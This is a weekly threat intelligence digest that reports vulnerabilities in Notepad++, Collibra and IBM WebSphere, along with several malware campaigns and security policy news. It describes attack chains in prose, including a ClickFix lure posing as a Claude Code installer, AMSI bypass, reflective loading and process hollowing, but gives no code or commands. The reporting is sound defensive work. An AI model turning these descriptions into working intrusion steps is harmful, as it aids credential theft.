Cyber Threat Intelligence Digest: Week 22

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Notepad++ Patches Three Vulnerabilities CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 - On 26 May 2026, Notepad++ released version 8.9.6.1 to patch three vulnerabilities affecting the Windows editor in versions up to and including 8.9.6, with no reports of exploitation in the wild at the time of writing. CVE-2026-48770 is a moderate-severity denial-of-service flaw where a malformed inter-process communication message can crash the application within the same Windows session.

The remaining two are high-severity arbitrary code execution vulnerabilities. CVE-2026-48778 targets the configured command-line interpreter, allowing code execution when a user opens a containing folder in Command Prompt if the configuration has been tampered with. CVE-2026-48800 similarly exploits user-defined commands in shortcuts.xml, enabling code execution when a malicious Run menu entry is selected.

CERT/CC Discloses CVE-2026-10621 and CVE-2026-10622 in Collibra Platform - On 2 June 2026, CERT/CC disclosed two vulnerabilities affecting the Collibra Agent component of the Collibra Platform, used in both SaaS and self-hosted deployments. Collibra had already released patches on 31 May 2026, and there are no reports of active exploitation at the time of writing.

CVE-2026-10621 is a path traversal vulnerability in the agent's restore functionality, where improper validation of file paths during ZIP extraction could allow an attacker to write arbitrary files outside the intended directory, potentially leading to remote code execution. CVE-2026-10622 is an improper authentication vulnerability caused by inadequate access controls on privileged REST API endpoints, allowing a threat actor to access privileged functionality without any authentication. Affected users should apply the available patches promptly.

IBM Patches Critical WebSphere Application Server Vulnerabilities CVE-2026-8644, CVE-2026-9319, CVE-2026-9311 and CVE-2026-9330 - On 1 June 2026, IBM disclosed and released interim fixes for four vulnerabilities affecting IBM WebSphere Application Server traditional versions 8.5 and 9.0, with no evidence of active exploitation at the time of writing. The two most critical are CVE-2026-8644 (severity 9.1), an identity spoofing vulnerability caused by authentication bypass, and CVE-2026-9319 (severity 9.0), a remote code execution flaw affecting deployments using JAX-WS endpoints with WS-Security, exploitable by unauthenticated attackers via deserialization of untrusted data.

The remaining two are also rated high severity. CVE-2026-9311 (severity 9.0) enables remote code execution through a bypass of security controls, whilst CVE-2026-9330 (severity 8.5) affects the SAML Web Single Sign-On component, where improper validation of user-supplied data during deserialization can be exploited via a crafted HTTP request combined with a suitable gadget chain. IBM recommends applying the available interim fixes for the associated APARs or upgrading to fixed WebSphere Application Server fix packs when available.

Potential Threats

Threat Actors Impersonate Anthropic Claude Code Installation Process to Deploy Reflective .NET Infostealer and Steal Browser Credentials - On 28 May 2026, Cyderes reported a campaign in which threat actors used SEO poisoning to impersonate Anthropic's Claude Code installation process, targeting non-technical users such as small business owners and teachers seeking installation guidance. The campaign abused Anthropic's branding without compromising Anthropic itself, delivering a .NET infostealer designed to access browser-stored credentials and exfiltrate sensitive data.

The attack began with a ClickFix lure instructing victims to run a command via the Windows Run dialog, which retrieved a polyglot payload containing legitimate audio content alongside an embedded HTA script. The HTA created a scheduled task launching a 32-bit PowerShell instance, which bypassed AMSI, generated a victim-specific URL using an MD5 hash of the machine and username, and fetched a second-stage obfuscated PowerShell script executed entirely in memory. This script used Assembly.Load to reflectively load the .NET infostealer into the existing PowerShell process, exfiltrating browser credentials without ever writing the payload to disk.

DriveSurge Uses ClickFix and Fake Update Lures Across Compromised Websites - On 30 May 2026, Silent Push reported on a threat actor tracked as DriverSurge, which operates a large-scale malware distribution campaign across thousands of compromised websites. Silent Push assesses that DriverSurge likely functions as an Initial Access Broker operating on a Pay-Per-Install model, delivering malware and selling victim access to downstream threat actors, with eight distinct infrastructure fingerprints identified to track its operations.

The infection chain begins with malicious JavaScript injected into compromised sites, redirecting visitors through a traffic distribution system that profiles victims and determines the appropriate next-stage payload. Depending on the victim profile, DriverSurge serves either FakeUpdates pages impersonating popular browsers - including Chrome, Firefox, Edge, and others - distributing malware disguised as software updates, or ClickFix lures that instruct users to execute malicious PowerShell or terminal commands directly on their machines.

Threat Actors Distribute Fileless PureLogs Information Stealer in Phishing Campaign Targeting Windows Users - On 26 May 2026, Fortinet reported a phishing campaign distributing a fileless variant of the PureLogs information stealer targeting Windows users. Delivered via purchase-order-themed emails containing a RAR archive with an obfuscated JavaScript file, the malware is capable of harvesting a broad range of sensitive data including browser credentials, cookies, session tokens, screenshots, clipboard contents, cryptocurrency wallet data, Discord tokens, and credentials from applications such as Outlook, Thunderbird, FileZilla, and various VPN clients, before compressing, encrypting, and transmitting the collected data to command-and-control infrastructure.

The execution chain begins when the JavaScript decrypts and launches a hidden PowerShell script, which decodes and runs an in-memory payload. This payload performs process hollowing against a legitimate MsBuild.exe instance - creating a suspended process, replacing its memory with a malicious .NET module, and resuming execution. The injected module then runs a downloader within the hollowed process, which retrieves an encrypted plugin from the C2 server, decrypts and decompresses it entirely in memory, and executes the final fileless PureLogs payload without ever writing it to disk.

General News

White House unveils pared-back AI executive order - The White House released a revised AI executive order after an initial version was scrapped last month following internal dissent, most notably from former AI and crypto czar David Sacks, who raised concerns about harm to innovation and competitiveness with China. The key change is a reduction in the voluntary government review period for AI models from 90 days to 30 days post-release, a compromise after industry had pushed for just 14 days. The order was signed behind closed doors and explicitly states the voluntary framework should not be interpreted as authorising any mandatory licensing or permitting requirements for AI development.

On cybersecurity, the order directs industry and government to collaborate on designating "covered frontier" models accessible to trusted partners for critical infrastructure protection and classified cyber threat tracking, alongside the creation of a Treasury-led AI cybersecurity clearinghouse. It also tasks CISA, the Office of the National Cyber Director, and the Office of Management and Budget with identifying federal grant funding for AI vulnerability detection. Senate Intelligence Committee Chairman Mark Warner broadly endorsed the measures, whilst noting that several provisions echoed those in the Biden-era AI executive order that was rescinded on the first day of the current administration.

Microsoft says it will not pursue security researchers after zero-day backlash - Microsoft clarified it has "no intention to pursue action" against security researchers who publish vulnerability findings, days after an official blog post sparked significant backlash. The original post had condemned a series of uncoordinated Windows zero-day releases by pseudonymous researcher Nightmare Eclipse as "never justifiable," with language widely perceived as threatening. The security community rallied around the researcher, who alleged Microsoft had deleted their MSRC account, withheld bounty payments, and removed their attribution from at least one advisory - allegations Microsoft did not directly address in its follow-up statement.

The new statement, shared via social media rather than Microsoft's official blog, acknowledged that "some interactions have fallen short" and notably dropped the phrase "responsible disclosure" in favour of "Coordinated Vulnerability Disclosure," a term Microsoft itself adopted in 2010 to avoid implying that non-compliant researchers are behaving irresponsibly. Security professional Katie Moussouris, who helped retire the earlier term whilst at Microsoft, had flagged its reappearance as deliberately loaded. Meanwhile, Nightmare Eclipse announced that following recent events other researchers had begun sharing vulnerabilities with them directly, and that a new Secure Boot vulnerability - reportedly capable of fully bypassing BitLocker and potentially compromising confidential virtual machines - would be released sometime in June.

Russia conducting daily attacks on UK 'from seabed to cyberspace,' spy chief warns -The head of GCHQ, Anne Keast-Butler, used a speech at Bletchley Park to deliver a stark warning that Russia is conducting daily hybrid attacks against the UK and Europe, targeting critical infrastructure, democratic processes, supply chains and public trust across everything from undersea cables to corporate networks. She called on businesses and government to treat cybersecurity with ten times greater urgency, noting that the risk of miscalculation is "as high as I have ever seen it." Countermeasures already underway include defending subsea cables, disrupting Russian sanctions-busting networks, and - disclosed last month - tracking and forcing the retreat of a Russian submarine operation near critical seabed infrastructure.

Keast-Butler also highlighted the growing threat posed by China, which she described as a science and technology superpower with sophisticated cyber and military capabilities, echoing recent Dutch military intelligence assessments. On AI, she announced plans for a new national cyber defence capability embedding agentic AI into systems able to detect and respond to attacks faster than human operators, to be delivered by the National Cyber Security Centre. She further warned that quantum computing will eventually break traditional encryption protecting government, financial, and military systems - including those relating to Britain's nuclear deterrent - and urged businesses to begin transitioning to quantum-resistant systems now.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.